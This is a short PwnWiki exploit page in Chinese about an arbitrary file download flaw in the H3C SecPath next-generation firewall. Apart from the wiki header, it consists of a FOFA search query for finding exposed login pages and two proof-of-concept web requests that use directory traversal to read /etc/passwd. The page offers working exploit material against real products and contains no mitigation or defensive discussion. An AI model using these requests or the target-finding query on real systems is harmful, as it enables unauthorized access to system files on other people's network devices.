H3C SecPath 下一代防火墙 任意文件下载漏洞

From PwnWiki
Revision as of 17:36, 18 June 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

H3C SecPath

FOFA

title="Web user login"

POC

/webui/?g=sys_dia_data_down&file_name=../etc/passwd

/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd